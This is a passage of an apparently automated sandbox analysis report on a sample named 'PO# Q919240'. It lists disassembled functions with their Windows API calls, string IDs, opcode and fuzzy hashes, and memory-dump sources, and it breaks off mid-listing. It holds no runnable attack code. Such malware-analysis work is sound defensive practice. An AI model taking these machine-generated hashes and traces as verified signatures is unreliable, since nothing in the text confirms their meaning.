                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                • API String ID: 600699880-22481851
                • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: DestroyWindow
                • String ID: static
                • API String ID: 3375834691-2160076837
                • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                Download Yara Rule
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ErrorMode$DriveType
                • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                • API String ID: 2907320926-3566645568
                • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                • DeleteObject.GDI32(00520000), ref: 00470A04
                • DestroyIcon.USER32(004F0044), ref: 00470A1C
                • DeleteObject.GDI32(E580D2D9), ref: 00470A34
                • DestroyWindow.USER32(006C0061), ref: 00470A4C
                • DestroyIcon.USER32(?), ref: 00470A73
                • DestroyIcon.USER32(?), ref: 00470A81
                • KillTimer.USER32(00000000,00000000), ref: 00470B00
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                • String ID:
                • API String ID: 1237572874-0
                • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                Download Yara Rule
                APIs
                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                • VariantInit.OLEAUT32(?), ref: 004793E1
                • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                • VariantCopy.OLEAUT32(?,?), ref: 00479461
                • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                • VariantClear.OLEAUT32(?), ref: 00479489
                • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                • VariantClear.OLEAUT32(?), ref: 004794CA
                • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                • String ID:
                • API String ID: 2706829360-0
                • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                Download Yara Rule
                APIs
                • GetKeyboardState.USER32(?), ref: 0044480E
                • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                • GetKeyState.USER32(000000A0), ref: 004448AA
                • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                • GetKeyState.USER32(000000A1), ref: 004448D9
                • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                • GetKeyState.USER32(00000011), ref: 00444903
                • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                • GetKeyState.USER32(00000012), ref: 0044492D
                • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                • GetKeyState.USER32(0000005B), ref: 00444958
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: State$Async$Keyboard
                • String ID:
                • API String ID: 541375521-0
                • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: InitVariant$_malloc_wcscpy_wcslen
                • String ID:
                • API String ID: 3413494760-0
                • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: AddressProc_free_malloc$_strcat_strlen
                • String ID: AU3_FreeVar
                • API String ID: 2634073740-771828931
                • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                Download Yara Rule
                APIs
                • CoInitialize.OLE32 ref: 0046C63A
                • CoUninitialize.OLE32 ref: 0046C645
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                  • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                  • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                • IIDFromString.OLE32(?,?), ref: 0046C705
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                • API String ID: 2294789929-1287834457
                • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                  • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                  • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                • ImageList_EndDrag.COMCTL32 ref: 00471169
                • ReleaseCapture.USER32 ref: 0047116F
                • SetWindowTextW.USER32(?,00000000), ref: 00471206
                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                • API String ID: 2483343779-2107944366
                • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                • _wcslen.LIBCMT ref: 00450720
                • _wcscat.LIBCMT ref: 00450733
                • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend$Window_wcscat_wcslen
                • String ID: -----$SysListView32
                • API String ID: 4008455318-3975388722
                • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                • GetParent.USER32 ref: 00469C98
                • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                • GetParent.USER32 ref: 00469CBC
                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend$CtrlParent$_memmove_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 2360848162-1403004172
                • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                • String ID:
                • API String ID: 262282135-0
                • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend$LongWindow
                • String ID:
                • API String ID: 312131281-0
                • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                • SendMessageW.USER32(75A523D0,00001001,00000000,?), ref: 00448E16
                • SendMessageW.USER32(75A523D0,00001026,00000000,?), ref: 00448E25
                  • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
